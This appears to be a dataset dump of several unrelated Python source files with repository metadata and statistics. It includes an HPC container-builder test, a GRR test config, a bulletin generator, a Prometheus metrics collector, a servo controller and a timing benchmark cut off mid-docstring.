| 17.647059 | 58 | 0.653333 | 45 | 300 | 4.088889 | 0.6 | 0.076087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004202 | 0.206667 | 300 | 16 | 59 | 18.75 | 0.768908 | 0 | 0 | 0 | 0 | 0 | 0.156667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.1 | 0.2 | 0.5 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
ce6649c4f6c16cf45f7213f96f05b37dd34d751f | 4,936 | py | Python | test/test_hdf5.py | gonzalobg/hpc-container-maker | dd5486c3fbb0fce38d825173022908ef0f96f77e | [
"Apache-2.0"
] | 1 | 2021-01-04T00:29:22.000Z | 2021-01-04T00:29:22.000Z | test/test_hdf5.py | gonzalobg/hpc-container-maker | dd5486c3fbb0fce38d825173022908ef0f96f77e | [
"Apache-2.0"
] | null | null | null | test/test_hdf5.py | gonzalobg/hpc-container-maker | dd5486c3fbb0fce38d825173022908ef0f96f77e | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=invalid-name, too-few-public-methods, bad-continuation
"""Test cases for the hdf5 module"""
from __future__ import unicode_literals
from __future__ import print_function
import logging # pylint: disable=unused-import
import unittest
from helpers import centos, docker, ubuntu
from hpccm.building_blocks.hdf5 import hdf5
class Test_hdf5(unittest.TestCase):
    # Each test renders the hdf5 building block and compares it against a
    # known-good Dockerfile snippet for a distro / option combination.

    def setUp(self):
        """Disable logging output messages"""
        logging.disable(logging.ERROR)

    # Default build on Ubuntu: apt packages, source build, ENV paths.
    @ubuntu
    @docker
    def test_defaults_ubuntu(self):
        """Default hdf5 building block"""
        h = hdf5()
        self.assertEqual(str(h),
r'''# HDF5 version 1.10.6
RUN apt-get update -y && \
    DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
        bzip2 \
        file \
        make \
        wget \
        zlib1g-dev && \
    rm -rf /var/lib/apt/lists/*
RUN mkdir -p /var/tmp && wget -q -nc --no-check-certificate -P /var/tmp http://www.hdfgroup.org/ftp/HDF5/releases/hdf5-1.10/hdf5-1.10.6/src/hdf5-1.10.6.tar.bz2 && \
    mkdir -p /var/tmp && tar -x -f /var/tmp/hdf5-1.10.6.tar.bz2 -C /var/tmp -j && \
    cd /var/tmp/hdf5-1.10.6 && ./configure --prefix=/usr/local/hdf5 --enable-cxx --enable-fortran && \
    make -j$(nproc) && \
    make -j$(nproc) install && \
    rm -rf /var/tmp/hdf5-1.10.6 /var/tmp/hdf5-1.10.6.tar.bz2
ENV CPATH=/usr/local/hdf5/include:$CPATH \
    HDF5_DIR=/usr/local/hdf5 \
    LD_LIBRARY_PATH=/usr/local/hdf5/lib:$LD_LIBRARY_PATH \
    LIBRARY_PATH=/usr/local/hdf5/lib:$LIBRARY_PATH \
    PATH=/usr/local/hdf5/bin:$PATH''')

    # Default build on CentOS: same source build but yum packages.
    @centos
    @docker
    def test_defaults_centos(self):
        """Default hdf5 building block"""
        h = hdf5()
        self.assertEqual(str(h),
r'''# HDF5 version 1.10.6
RUN yum install -y \
        bzip2 \
        file \
        make \
        wget \
        zlib-devel && \
    rm -rf /var/cache/yum/*
RUN mkdir -p /var/tmp && wget -q -nc --no-check-certificate -P /var/tmp http://www.hdfgroup.org/ftp/HDF5/releases/hdf5-1.10/hdf5-1.10.6/src/hdf5-1.10.6.tar.bz2 && \
    mkdir -p /var/tmp && tar -x -f /var/tmp/hdf5-1.10.6.tar.bz2 -C /var/tmp -j && \
    cd /var/tmp/hdf5-1.10.6 && ./configure --prefix=/usr/local/hdf5 --enable-cxx --enable-fortran && \
    make -j$(nproc) && \
    make -j$(nproc) install && \
    rm -rf /var/tmp/hdf5-1.10.6 /var/tmp/hdf5-1.10.6.tar.bz2
ENV CPATH=/usr/local/hdf5/include:$CPATH \
    HDF5_DIR=/usr/local/hdf5 \
    LD_LIBRARY_PATH=/usr/local/hdf5/lib:$LD_LIBRARY_PATH \
    LIBRARY_PATH=/usr/local/hdf5/lib:$LIBRARY_PATH \
    PATH=/usr/local/hdf5/bin:$PATH''')

    # ldconfig=True registers the library dir instead of exporting
    # LD_LIBRARY_PATH; also pins an explicit version.
    @ubuntu
    @docker
    def test_ldconfig(self):
        """ldconfig option"""
        h = hdf5(ldconfig=True, version='1.10.4')
        self.assertEqual(str(h),
r'''# HDF5 version 1.10.4
RUN apt-get update -y && \
    DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
        bzip2 \
        file \
        make \
        wget \
        zlib1g-dev && \
    rm -rf /var/lib/apt/lists/*
RUN mkdir -p /var/tmp && wget -q -nc --no-check-certificate -P /var/tmp http://www.hdfgroup.org/ftp/HDF5/releases/hdf5-1.10/hdf5-1.10.4/src/hdf5-1.10.4.tar.bz2 && \
    mkdir -p /var/tmp && tar -x -f /var/tmp/hdf5-1.10.4.tar.bz2 -C /var/tmp -j && \
    cd /var/tmp/hdf5-1.10.4 && ./configure --prefix=/usr/local/hdf5 --enable-cxx --enable-fortran && \
    make -j$(nproc) && \
    make -j$(nproc) install && \
    echo "/usr/local/hdf5/lib" >> /etc/ld.so.conf.d/hpccm.conf && ldconfig && \
    rm -rf /var/tmp/hdf5-1.10.4 /var/tmp/hdf5-1.10.4.tar.bz2
ENV CPATH=/usr/local/hdf5/include:$CPATH \
    HDF5_DIR=/usr/local/hdf5 \
    LIBRARY_PATH=/usr/local/hdf5/lib:$LIBRARY_PATH \
    PATH=/usr/local/hdf5/bin:$PATH''')

    # runtime() emits the second-stage instructions: runtime deps plus a
    # COPY of the install tree from the build stage.
    @ubuntu
    @docker
    def test_runtime(self):
        """Runtime"""
        h = hdf5()
        r = h.runtime()
        self.assertEqual(r,
r'''# HDF5
RUN apt-get update -y && \
    DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
        zlib1g && \
    rm -rf /var/lib/apt/lists/*
COPY --from=0 /usr/local/hdf5 /usr/local/hdf5
ENV CPATH=/usr/local/hdf5/include:$CPATH \
    HDF5_DIR=/usr/local/hdf5 \
    LD_LIBRARY_PATH=/usr/local/hdf5/lib:$LD_LIBRARY_PATH \
    LIBRARY_PATH=/usr/local/hdf5/lib:$LIBRARY_PATH \
    PATH=/usr/local/hdf5/bin:$PATH''')
| 37.393939 | 164 | 0.640194 | 772 | 4,936 | 4.034974 | 0.238342 | 0.024077 | 0.096308 | 0.030819 | 0.633066 | 0.633066 | 0.624077 | 0.61862 | 0.613804 | 0.602889 | 0 | 0.047343 | 0.195502 | 4,936 | 131 | 165 | 37.679389 | 0.737094 | 0.167747 | 0 | 0.5 | 0 | 0 | 0.006985 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 1 | 0.147059 | false | 0 | 0.176471 | 0 | 0.352941 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce6e3c09a2e66420e8e9c581cff7e8f8d2db23fe | 2,282 | py | Python | config/test.py | nahidupa/grr | 100a9d85ef2abb234e12e3ac2623caffb4116be7 | [
"Apache-2.0"
] | 1 | 2016-02-13T15:40:20.000Z | 2016-02-13T15:40:20.000Z | config/test.py | nahidupa/grr | 100a9d85ef2abb234e12e3ac2623caffb4116be7 | [
"Apache-2.0"
] | 3 | 2020-02-11T22:29:15.000Z | 2021-06-10T17:44:31.000Z | config/test.py | nahidupa/grr | 100a9d85ef2abb234e12e3ac2623caffb4116be7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""Configuration parameters for the test subsystem."""
import os
from grr.lib import config_lib
# Default for running in the current directory
config_lib.DEFINE_constant_string(
"Test.srcdir",
os.path.normpath(os.path.dirname(__file__) + "/../.."),
"The directory containing the source code.")
config_lib.DEFINE_constant_string(
"Test.data_dir",
default="%(Test.srcdir)/grr/test_data",
help="The directory where test data exist.")
config_lib.DEFINE_constant_string(
"Test.config",
default="%(Test.srcdir)/grr/config/grr-server.yaml",
help="The path where the test configuration file exists.")
config_lib.DEFINE_constant_string(
"Test.additional_test_config",
default="%(Test.data_dir)/localtest.yaml",
help="The path to a test config with local customizations.")
config_lib.DEFINE_string("Test.tmpdir", "/tmp/",
help="Somewhere to write temporary files.")
config_lib.DEFINE_string("Test.data_store", "FakeDataStore",
"The data store to run the tests against.")
config_lib.DEFINE_integer("Test.remote_pdb_port", 2525,
"Remote debugger port.")
config_lib.DEFINE_list("Test.end_to_end_client_ids", [],
"List of client ids to perform regular end_to_end tests"
" on. These clients should be always on and connected"
" to the network.")
config_lib.DEFINE_list("Test.end_to_end_client_hostnames", [],
"List of hostnames to perform regular end_to_end tests"
" on. These clients should be always on and connected"
" to the network.")
config_lib.DEFINE_string("Test.end_to_end_result_check_wait", "50m",
"rdfvalue.Duration string that determines how long we "
"wait after starting the endtoend test hunt before we "
"check the results. Should be long enough that all "
"clients will have picked up the hunt, but not so "
"long that the flow gets timed out.")
config_lib.DEFINE_string("PrivateKeys.ca_key_raw_data", "",
"For testing purposes.")
| 40.75 | 80 | 0.633655 | 288 | 2,282 | 4.815972 | 0.40625 | 0.077866 | 0.118962 | 0.06633 | 0.322278 | 0.279019 | 0.18385 | 0.18385 | 0.18385 | 0.141312 | 0 | 0.003599 | 0.2695 | 2,282 | 55 | 81 | 41.490909 | 0.828434 | 0.049956 | 0 | 0.2 | 0 | 0 | 0.524537 | 0.113426 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.05 | 0 | 0.05 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce70b641f16acd29f6ec6fd771bef13d60610bff | 235 | py | Python | zad1_6.py | kamilhabrych/python-semestr5-lista1 | 65faeffe83bcc4706b2818e2e7802d986b19244b | [
"MIT"
] | null | null | null | zad1_6.py | kamilhabrych/python-semestr5-lista1 | 65faeffe83bcc4706b2818e2e7802d986b19244b | [
"MIT"
] | null | null | null | zad1_6.py | kamilhabrych/python-semestr5-lista1 | 65faeffe83bcc4706b2818e2e7802d986b19244b | [
"MIT"
] | null | null | null | x = int(input('Podaj pierwsza liczbe calkowita: '))
y = int(input('Podaj druga liczbe calkowita: '))
z = int(input('Podaj trzecia liczbe calkowita: '))
print()
if x > 10:
print(x)
if y > 10:
print(y)
if z > 10:
print(z) | 16.785714 | 51 | 0.617021 | 37 | 235 | 3.918919 | 0.378378 | 0.165517 | 0.268966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032787 | 0.221277 | 235 | 14 | 52 | 16.785714 | 0.759563 | 0 | 0 | 0 | 0 | 0 | 0.402542 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce70fc922ee9bc7104f6b739b1a14c96b849d90a | 6,194 | py | Python | modules/bulletinGenerator_Kingsgrove.py | featherbear/swec-elvanto-automation | 7f330ca5a87623ca452170efb4845814a4fbc2ad | [
"MIT"
] | null | null | null | modules/bulletinGenerator_Kingsgrove.py | featherbear/swec-elvanto-automation | 7f330ca5a87623ca452170efb4845814a4fbc2ad | [
"MIT"
] | null | null | null | modules/bulletinGenerator_Kingsgrove.py | featherbear/swec-elvanto-automation | 7f330ca5a87623ca452170efb4845814a4fbc2ad | [
"MIT"
] | null | null | null | from mailmerge import MailMerge
import re
import os.path
from ElvantoAPIExtensions import Enums, Helpers
from modules.__stub__ import ModuleStub
class Module(ModuleStub):
__VERSION__ = "1.0"
__NAME__ = "bulletinGenerator_Kingsgrove"
# __executeTime__ = "16:00"
# __executeDay__ = "thursday"
settings = {
"general": {
"template": "",
"serviceName": "",
"pastorName": "",
"pastorTelephone": "",
"pastorEmail": "",
},
}
def validate(self):
self._baseFolder = os.path.join("files", self.__NAME__)
_templateFile = os.path.join(self._baseFolder, self.settings["general"]["template"])
if not os.path.isfile(_templateFile):
raise self.ModuleException("Invalid template file path")
self._templateFile = _templateFile
def run(self):
_serviceDate = Helpers.NextDate(Enums.Days.SUNDAY)
import math
weekNumber = int(math.ceil(_serviceDate.day / 7))
try:
thisWeekServices = Helpers.ServicesOnDate(self.conn, _serviceDate, ["volunteers", "plans"])
thisWeekService = next(
filter(lambda _: _.name == self.settings["general"]["serviceName"], thisWeekServices))
except Exception as e:
if e.__class__.__name__ == "ConnectionError":
print("Couldn't connect to Elvanto API")
return False
if type(e) == StopIteration:
print("Couldn't find an upcoming service called \"%s\"" % self.settings["general"]["serviceName"])
return False
print("An error occured:", e)
def getWeeklyConfession(week: int):
assert 1 <= week <= 5
confessionOne = """
Almighty and most merciful Father,
You have loved us with an everlasting love,
But we have gone our own way
And have rejected you in thought, word, and deed.
We are sorry for our sins
And turn away from them
For the sake of your Son who died for us,
Forgive us, cleanse us and change us.
By your Holy Spirit, enable us to live for you,
And to please you more and more;
Through Jesus Christ our Lord.
Amen.
"""
confessionTwo = """
Most merciful God,
we humbly admit that we need your help.
We confess that we have wandered from your way:
We have done wrong, and we have failed to do what is right.
You alone can save us.
Have mercy on us:
Wipe out our sins and teach us to forgive others.
Bring forth in us the fruit of the Spirit
That we may live as disciples of Christ.
This we ask in the name of Jesus our Saviour.
Amen.
"""
confessionThree = """
Heavenly Father,
We praise you for adopting us as your children
And making us heirs of eternal life.
In your mercy you have washed us from our sins
And made us clean in your sight.
Yet we still fail to love you as we should and serve you as we ought.
Forgive us our sins and renew us by your grace,
That we may continue to grow as members of Christ,
In whom alone is our salvation.
Amen.
"""
confessionFour = """
Merciful God, our maker and our judge, we have sinned against you in thought, word, and deed:
we have not loved you with our whole heart, we have not loved our neighbours as ourselves:
we repent, and are sorry for all our sins.
Father, forgive us.
Strengthen us to love and obey you in newness of life;
through Jesus Christ our Lord.
Amen
"""
confessionFive = """
Lord God,
we have sinned against you;
we have done evil in your sight.
We are sorry and repent.
Have mercy on us according to your love.
Wash away our wrongdoing and cleanse us from our sin.
Renew a right spirit within us
and restore us to the joy of your salvation,
through Jesus Christ our Lord. Amen.
"""
return [None, confessionOne, confessionTwo, confessionThree, confessionFour, confessionFive][
week].strip()
stringify = lambda volunteerArray: ", ".join(map(repr, volunteerArray))
replacements = {
"prettyDate": _serviceDate.strftime("%A, %#d %B %Y"),
"branch": self.settings["general"]["serviceName"],
"weeklyConfession": getWeeklyConfession(weekNumber),
"pastorName": self.settings["general"]["pastorName"],
"pastorTelephone": self.settings["general"]["pastorTelephone"],
"pastorEmail": self.settings["general"]["pastorEmail"],
"scripturePassage": None,
"sermonPassage": None,
"speaker": None,
}
map(print, thisWeekService.plan)
scripturePassageItem = next(filter(lambda _: _.title.startswith("Bible Reading") and not _.title.startswith("Bible Reading (Sermon)"), thisWeekService.plan))
_scripturePassageItem = re.search('^Bible Reading (?:- )?(.*)$', scripturePassageItem.title)
if _scripturePassageItem:
replacements["scripturePassage"] = _scripturePassageItem.group(1)
else:
replacements["scripturePassage"] = re.sub('<.*?>', "", scripturePassageItem.description).strip()
# Details in the title
sermonPassageItem = next(filter(lambda _: _.title.startswith("Bible Reading (Sermon"), thisWeekService.plan))
replacements["sermonPassage"] = re.sub('<.*?>', "", sermonPassageItem.description).strip()
replacements["speaker"] = stringify(thisWeekService.volunteers.byPositionName("Speaker"))
with MailMerge(self._templateFile) as document:
document.merge(**replacements)
filePath = os.path.join(self._baseFolder, "SWEC %s - Bulletin %s.docx"
% (self.settings["general"]["serviceName"], _serviceDate.strftime("%#d %B %Y")))
document.write(filePath)
| 41.293333 | 165 | 0.610268 | 685 | 6,194 | 5.436496 | 0.394161 | 0.036251 | 0.040816 | 0.032223 | 0.104458 | 0.080559 | 0.057197 | 0 | 0 | 0 | 0 | 0.002292 | 0.295609 | 6,194 | 149 | 166 | 41.57047 | 0.851249 | 0.011947 | 0 | 0.077519 | 0 | 0.007752 | 0.484303 | 0.004578 | 0 | 0 | 0 | 0 | 0.007752 | 1 | 0.023256 | false | 0.069767 | 0.046512 | 0 | 0.124031 | 0.031008 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
ce78d29afc746e1513a1eb1206ac1f0e6d11d03c | 3,791 | py | Python | powerfulseal/metriccollectors/prometheus_collector.py | snehalbiche/powerfulseal | 4ab70e0db8f33bd390d87e65c662774991483726 | [
"Apache-2.0"
] | 1 | 2018-07-12T22:04:51.000Z | 2018-07-12T22:04:51.000Z | powerfulseal/metriccollectors/prometheus_collector.py | kz/powerfulseal | 24276dd670777a72fed1780539ffe03f3bea63b9 | [
"Apache-2.0"
] | null | null | null | powerfulseal/metriccollectors/prometheus_collector.py | kz/powerfulseal | 24276dd670777a72fed1780539ffe03f3bea63b9 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from prometheus_client import Counter
from powerfulseal.metriccollectors import AbstractCollector
from powerfulseal.metriccollectors.collector import NODE_SOURCE, POD_SOURCE
STATUS_SUCCESS = 'success'
STATUS_FAILURE = 'failure'
# Define Prometheus metrics to be stored in the default registry
POD_KILLS_METRIC_NAME = 'seal_pod_kills_total'
POD_KILLS = Counter(POD_KILLS_METRIC_NAME,
'Number of pods killed (including failures)',
['status', 'namespace', 'name'])
NODE_STOPS_METRIC_NAME = 'seal_nodes_stopped_total'
NODE_STOPS = Counter(NODE_STOPS_METRIC_NAME,
'Number of nodes stopped (including failures)',
['status', 'uid', 'name'])
EXECUTE_FAILED_METRIC_NAME = 'seal_execute_failed_total'
EXECUTE_FAILURES = Counter(EXECUTE_FAILED_METRIC_NAME,
'Increasing counter for command execution failures',
['uid', 'name'])
FILTERED_TO_EMPTY_SET_METRIC_NAME = 'seal_empty_filter_total'
FILTERED_TO_EMPTY_SET = Counter(FILTERED_TO_EMPTY_SET_METRIC_NAME,
'Increasing counter for cases where filtering '
'returns an empty result')
PROBABILITY_FILTER_NOT_PASSED_METRIC_NAME = 'seal_probability_filter_not_passed_total'
PROBABILITY_FILTER_NOT_PASSED = Counter(PROBABILITY_FILTER_NOT_PASSED_METRIC_NAME,
'Increasing counter for cases where the'
' probability filter does not pass any '
'nodes')
MATCHED_TO_EMPTY_SET_METRIC_NAME = 'seal_empty_match_total'
MATCHED_TO_EMPTY_SET = Counter(MATCHED_TO_EMPTY_SET_METRIC_NAME,
'Increasing counter for cases where matching '
'returns an empty result',
['source'])
class PrometheusCollector(AbstractCollector):
def __init__(self):
# Export 0 for time series metrics which have labels which can have default
# values filled to avoid missing metrics. The Prometheus Python library
# already exports 0 for metrics which do not have any labels.
MATCHED_TO_EMPTY_SET.labels(NODE_SOURCE).inc(0)
MATCHED_TO_EMPTY_SET.labels(POD_SOURCE).inc(0)
def add_pod_killed_metric(self, pod):
POD_KILLS.labels(STATUS_SUCCESS, pod.namespace, pod.name).inc()
def add_pod_kill_failed_metric(self, pod):
POD_KILLS.labels(STATUS_FAILURE, pod.namespace, pod.name).inc()
def add_node_stopped_metric(self, node):
NODE_STOPS.labels(STATUS_SUCCESS, node.uid, node.name).inc()
def add_node_stop_failed_metric(self, node):
NODE_STOPS.labels(STATUS_FAILURE, node.uid, node.name).inc()
def add_execute_failed_metric(self, node):
EXECUTE_FAILURES.labels(node.uid, node.name).inc()
def add_filtered_to_empty_set_metric(self):
FILTERED_TO_EMPTY_SET.inc()
def add_probability_filter_passed_no_nodes_filter(self):
PROBABILITY_FILTER_NOT_PASSED.inc()
def add_matched_to_empty_set_metric(self, source):
MATCHED_TO_EMPTY_SET.labels(source).inc()
| 42.595506 | 86 | 0.69665 | 483 | 3,791 | 5.161491 | 0.306418 | 0.048135 | 0.048135 | 0.047734 | 0.287204 | 0.222222 | 0.185319 | 0.040112 | 0.040112 | 0.040112 | 0 | 0.004129 | 0.233448 | 3,791 | 88 | 87 | 43.079545 | 0.853751 | 0.217884 | 0 | 0 | 0 | 0 | 0.191381 | 0.04547 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0.098039 | 0.058824 | 0 | 0.254902 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
ce7dcfa1ba0e4b637228e061f83bafab463cb61b | 766 | py | Python | servoblst.py | ForToffee/MeArm | 90fdd94fd96b53b3579c6d8132e8586188e3d344 | [
"MIT"
] | 1 | 2016-04-04T17:39:54.000Z | 2016-04-04T17:39:54.000Z | servoblst.py | ForToffee/MeArm | 90fdd94fd96b53b3579c6d8132e8586188e3d344 | [
"MIT"
] | null | null | null | servoblst.py | ForToffee/MeArm | 90fdd94fd96b53b3579c6d8132e8586188e3d344 | [
"MIT"
] | null | null | null | import time
import os
servos = {}
class ServoController:
def __init__(self):
os.system('sudo /home/pi/PiBits/ServoBlaster/user/servod')
def setAngle(self, servo_id, degrees):
if degrees > 90:
degrees = 90
elif degrees < -90:
degrees = -90
#http://www.raspberrypi.org/forums/viewtopic.php?f=44&t=36572
pulse = 1520 + (degrees * 400) / 45
os.system("echo %d=%d > /dev/servoblaster" % (servo_id, pulse/10))
time.sleep(0.1)
servos[servo_id] = degrees
#print "angle=%s pulse=%s" % (degrees, pulse)
return servos[servo_id]
def incAngle(self, servo_id, increment):
angle = servos.get(servo_id, 0)
return self.setAngle(servo_id, angle + increment)
def clean_up(self):
print "cleaning up"
os.system('sudo killall servod')
| 22.529412 | 68 | 0.680157 | 112 | 766 | 4.544643 | 0.508929 | 0.096267 | 0.047151 | 0.070727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045886 | 0.174935 | 766 | 33 | 69 | 23.212121 | 0.759494 | 0.13577 | 0 | 0 | 0 | 0 | 0.159091 | 0.060606 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.090909 | null | null | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce815d6c526703afd41758b750594101532e6d14 | 724 | py | Python | warmup/sock_merchant.py | franloza/hackerrank | e66f5f5c4c1c7c0fe93146d29140692cd71625b7 | [
"MIT"
] | null | null | null | warmup/sock_merchant.py | franloza/hackerrank | e66f5f5c4c1c7c0fe93146d29140692cd71625b7 | [
"MIT"
] | null | null | null | warmup/sock_merchant.py | franloza/hackerrank | e66f5f5c4c1c7c0fe93146d29140692cd71625b7 | [
"MIT"
] | null | null | null | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the sockMerchant function below.
def sockMerchant(n, ar):
socks = {}
for elem in ar:
if elem in socks:
socks[elem] += 1
else:
socks[elem] = 1
return sum(elem // 2 for elem in socks.values())
# Read from input
# if __name__ == '__main__':
# fptr = open(os.environ['OUTPUT_PATH'], 'w')
#
# n = int(input())
#
# ar = list(map(int, input().rstrip().split()))
#
# result = sockMerchant(n, ar)
#
# fptr.write(str(result) + '\n')
#
# fptr.close()
# Toy case
if __name__ == '__main__':
n, ar = 9, [10, 20, 20, 10, 10, 30, 50, 10, 20]
print(sockMerchant(n, ar))
| 19.567568 | 52 | 0.56768 | 101 | 724 | 3.90099 | 0.544554 | 0.030457 | 0.114213 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 0.269337 | 724 | 36 | 53 | 20.111111 | 0.701323 | 0.429558 | 0 | 0 | 0 | 0 | 0.020151 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.3125 | 0 | 0.4375 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
ce882279c49c7c6dbe430df86a631892b7154111 | 3,342 | py | Python | tests/zzz_deprecated_unmaintained/obsmodel/TestZeroMeanGaussLocalStepSpeed.py | HongminWu/bnpy | 04c918cc1150ca8d9694c093633d539d9286a1b6 | [
"BSD-3-Clause"
] | 3 | 2018-07-02T03:50:23.000Z | 2019-05-16T03:23:55.000Z | tests/zzz_deprecated_unmaintained/obsmodel/TestZeroMeanGaussLocalStepSpeed.py | HongminWu/bnpy | 04c918cc1150ca8d9694c093633d539d9286a1b6 | [
"BSD-3-Clause"
] | 1 | 2021-01-07T01:33:06.000Z | 2021-01-07T01:33:06.000Z | tests/zzz_deprecated_unmaintained/obsmodel/TestZeroMeanGaussLocalStepSpeed.py | birlrobotics/bnpy | 8f297d8f3e4a56088d7755134c329f63a550be9e | [
"BSD-3-Clause"
] | 1 | 2020-09-01T13:21:18.000Z | 2020-09-01T13:21:18.000Z | import numpy as np
import scipy.linalg
import argparse
import time
from contextlib import contextmanager
def measureTime(f, nTrial=3):
def f_timer(*args, **kwargs):
times = list()
for rep in range(nTrial):
start = time.time()
result = f(*args, **kwargs)
end = time.time()
times.append(end-start)
if rep == 0:
print "trial %2d/%2d: %.3f sec %s" % (
rep+1, nTrial, times[-1], f.__name__)
else:
print "trial %2d/%2d: %.3f sec" % (
rep+1, nTrial, times[-1])
print "mean of %2d: %.3f sec" % (
nTrial, np.mean(times))
print "median of %2d: %.3f sec" % (
nTrial, np.median(times))
print ''
return result
return f_timer
@measureTime
def mahalDist_np_solve(X=None, B=None, cholB=None):
''' Compute mahalanobis the old fashioned way.
'''
if B is not None:
cholB = np.linalg.cholesky(B)
Q = np.linalg.solve(cholB, X.T)
return Q
@measureTime
def mahalDist_scipy_solve(X=None, B=None, cholB=None):
''' Compute mahalanobis the old fashioned way.
'''
if B is not None:
cholB = np.linalg.cholesky(B)
Q = scipy.linalg.solve(cholB, X.T)
return Q
@measureTime
def mahalDist_scipy_solve_triangular(X=None, B=None, cholB=None):
''' Compute mahalanobis with triangular method
'''
if B is not None:
cholB = np.linalg.cholesky(B)
Q = scipy.linalg.solve_triangular(cholB, X.T, lower=True)
return Q
@measureTime
def mahalDist_scipy_solve_triangular_nocheck(
X=None, B=None, cholB=None):
''' Compute mahalanobis with triangular method
'''
if B is not None:
cholB = np.linalg.cholesky(B)
Q = scipy.linalg.solve_triangular(
cholB, X.T, lower=True, check_finite=False)
return Q
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--N', type=int, default=1e5)
parser.add_argument('--D', type=int, default=64)
args = parser.parse_args()
N = args.N
D = args.D
print "TIMING TEST: N=%d D=%d" % (N, D)
X = np.random.randn(N, D)
R = np.random.randn(D, D)
B = np.dot(R.T, R) + np.eye(D, D)
cholB = np.linalg.cholesky(B)
mahalDist_np_solve(X=X, cholB=cholB)
mahalDist_scipy_solve(X=X, cholB=cholB)
mahalDist_scipy_solve_triangular(X=X, cholB=cholB)
mahalDist_scipy_solve_triangular_nocheck(X=X, cholB=cholB)
"""
In [41]: Qs = scipy.linalg.solve_triangular(cholB, X.T, lower=True, check_finite=False)
In [42]: %timeit -n1 -r1 Q = scipy.linalg.solve_triangular(cholB, X.T, lower=True, check_finite=False)
1 loops, best of 1: 625 ms per loop
In [43]: %timeit -n1 -r1 Q = scipy.linalg.solve_triangular(cholB, X.T, lower=True, check_finite=False)
1 loops, best of 1: 623 ms per loop
